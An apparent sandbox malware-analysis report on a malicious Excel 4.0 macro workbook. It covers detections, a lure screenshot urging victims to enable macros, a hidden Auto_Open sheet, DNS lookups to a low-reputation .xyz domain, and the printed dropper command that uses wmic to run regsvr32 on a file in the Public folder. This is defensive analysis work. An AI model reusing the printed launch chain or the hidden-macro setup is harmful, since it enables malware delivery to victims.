Loading ...

Play interactive tourEdit tour

Analysis Report Documents (252).xlsm

Overview

General Information

Sample Name:Documents (252).xlsm
Analysis ID:382991
MD5:966c13f10fa0b3bfe75da87bca817396
SHA1:1769db2ec1d019b526e63637a413ceab10d00ff3
SHA256:963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Wmic Launch regsvr32
Contains functionality to create processes via WMI
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office document connecting to suspicious TLD
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Potential document exploit detected (performs DNS queries with low reputation score)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2208 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 5316 cmdline: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref' MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 5488 cmdline: regsvr32 -s C:/Users/Public/dbhfr.xref MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Wmic Launch regsvr32Show sources
Source: Process startedAuthor: Joe Security: Data: Command: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', CommandLine: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2208, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', ProcessId: 5316

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
Potential document exploit detected (performs DNS queries with low reputation score)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: name: xherzog24pv.xyz
Source: global trafficDNS query: name: xherzog24pv.xyz

Networking:

barindex
Office document connecting to suspicious TLDShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS traffic detected: xherzog24pv.xyz
Outdated Microsoft Office dropper detectedShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: xherzog24pv.xyz is down
Performs DNS queries to domains with low reputationShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: xherzog24pv.xyz
Source: unknownDNS traffic detected: query: xherzog24pv.xyz replaycode: Name error (3)
Source: unknownDNS traffic detected: queries for: xherzog24pv.xyz
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.aadrm.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.cortana.ai
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.office.net
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.onedrive.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://augloop.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cdn.entity.
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://clients.config.office.net/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://config.edge.skype.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cortana.ai
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cortana.ai/api
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://cr.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dev.cortana.ai
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://devnull.onenote.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://directory.services.
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://graph.windows.net
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://graph.windows.net/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://lifecycle.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://login.windows.local
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://management.azure.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://management.azure.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://messaging.office.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ncus.contentsync.
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://officeapps.live.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://onedrive.live.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://outlook.office.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://outlook.office365.com/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://settings.outlook.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://staging.cortana.ai
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://tasks.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://wus2.contentsync.
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" from the yellow bar above @ Once You have Enable Editing, please click "Enable Con
Source: Screenshot number: 4Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? m You are using iOS or
Contains functionality to create processes via WMIShow sources
Source: WMIC.exe, 00000001.00000002.219131181.0000000002FA0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=MXPXCVPUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsic
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Documents (252).xlsmInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: Documents (252).xlsmInitial sample: Sheet size: 88698
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="23127"/><workbookPr defaultThemeVersion="124226"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Janadark\3D Objects\corp\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="8_{29DC8E7E-AE72-4A96-8469-EA40E9BC458E}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="dbapi &quot;=sd" sheetId="4" state="hidden" r:id="rId1"/><sheet name="FrameSecure" sheetId="5" r:id="rId2"/></sheets><definedNames><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="_xlnm.Auto_Open">'dbapi "=sd'!$AA$6</definedName></definedNames><calcPr calcId="144525"/></workbook>
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal96.troj.expl.evad.winXLSM@5/14@1/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{9B76BBAA-F792-4814-A6ED-571A218FDF96} - OProcSessId.datJump to behavior
